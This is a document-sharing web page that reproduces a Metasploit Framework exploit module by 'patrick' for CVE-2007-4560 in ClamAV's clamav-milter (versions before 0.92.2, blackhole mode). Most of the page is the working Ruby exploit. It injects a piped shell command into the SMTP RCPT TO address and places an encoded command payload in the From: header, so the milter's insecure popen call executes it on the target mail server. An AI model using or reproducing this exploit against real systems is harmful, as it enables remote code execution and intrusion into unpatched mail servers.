ClamAV Milter 0.92.2 BlackholeMode sendmail Code Execution.pdf

About Global Documents

Global Documents provides you with documents from around the globe on a variety of topics for your enjoyment.

Global Documents utilizes edocr for all its document needs due to edocr's wonderful content features. Thousands of professionals and businesses around the globe publish marketing, sales, operations, customer service and financial documents making it easier for prospects and customers to find content.

ClamAV Milter execute BlackholeMode Sendmail Code Code execute patrick datastore MAILTO Exploit msf Exploit Remote Payload Sendmail Code execute temporary file sploit

1 ##
2 # $Id$
3 ##
4
5 ##
6 # This file is part of the Metasploit Framework and may be subject to
7 # redistribution and commercial restrictions. Please see the Metasploit
8 # Framework web site for more information on licensing and terms of use.
9 # http://metasploit.com/framework/
10 ##
11
12 require ’msf/core’
13
14
15 class Metasploit3 < Msf::Exploit::Remote
16
17
include Msf::Exploit::Remote::Smtp
18
19
def initialize(info = {})
20
super(update_info(info,
21
’Name’           => ’ClamAV Milter Blackhole−Mode Remote Code Execution’,
22
’Description’    => %q{
23
This module exploits a flaw in the Clam AntiVirus suite ’clamav−milter’
24
(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
25
When implemented with black hole mode enabled, it is possible to execute
26
commands remotely due to an insecure popen call.
27
},
28
’Author’         => [ ’patrick’ ],
29
’License’        => MSF_LICENSE,
30
’Version’        => ’$Revision$’,
31
’References’     =>
32
[
33
[ ’CVE’, ’2007−4560’ ],
34
[ ’OSVDB’, ’36909’ ],
35
[ ’BID’, ’25439’ ],
36
[ ’URL’, ’http://www.milw0rm.com/exploits/4761’ ],
37
],
38
’Privileged’     => true,
39
’Payload’        =>
40
{
41
’DisableNops’ => true,
42
’Space’       => 1024,
43
’Compat’      =>
44
{
45
’PayloadType’ => ’cmd’,
46
’RequiredCmd’ => ’generic perl ruby bash telnet’,
47
}
48
},
49
’Platform’       => ’unix’,
50
’Arch’           => ARCH_CMD,
51
’Targets’        => 
52
[
Page 1/2
ClamAV Milter 0.92.2 BlackholeMode sendmail Code Execution
patrick
08/24/2007
53
[ ’Automatic’, { }],
54
],
55
’DisclosureDate’ => ’Aug 24 2007’,
56
’DefaultTarget’  => 0))
57
58
register_options(
59
[
60
OptString.new(’MAILTO’, [ true, ’TO address of the e−mail’, ’nobody@localhost’]),
61
], self.class)
62
end
63
64
def exploit
65
66
# ClamAV writes randomized msg.###### temporary files in a randomized
67
# /tmp/clamav−#######################/ directory. This directory is
68
# the clamav−milter process working directory.
69
#
70
# We *can* execute arbitrary code directly from ’sploit’, however the
71
# SMTP RFC rejects all payloads with the exception of generic CMD
72
# payloads due to the IO redirects. I discovered that the ’From:’
73
# header is written to this temporary file prior to the vulnerable
74
# call, so we call the file itself and payload.encoded is executed.
75
76
sploit = "sh msg*" # Execute the clamav−milter temporary file.
77
78
# Create the malicious RCPT TO before connecting,
79
# to make good use of the Exploit::Smtp support.
80
81
oldaddr = datastore[’MAILTO’]
82
newaddr = oldaddr.split(’@’)
83
84
datastore[’MAILTO’] = "<#{newaddr[0]}+\"|#{sploit}\"@#{newaddr[1]}>"
85
86
connect_login
87
88
sock.put("From: ;#{payload.encoded}\r\n") # We are able to stick our payload in this header
89
sock.put(".\r\n")
90
91
# Clean up RCPT TO afterwards
92
93
datastore[’MAILTO’] = oldaddr
94
95
handler
96
disconnect
97
end
98
99 end
Page 2/2
ClamAV Milter 0.92.2 BlackholeMode sendmail Code Execution
patrick
08/24/2007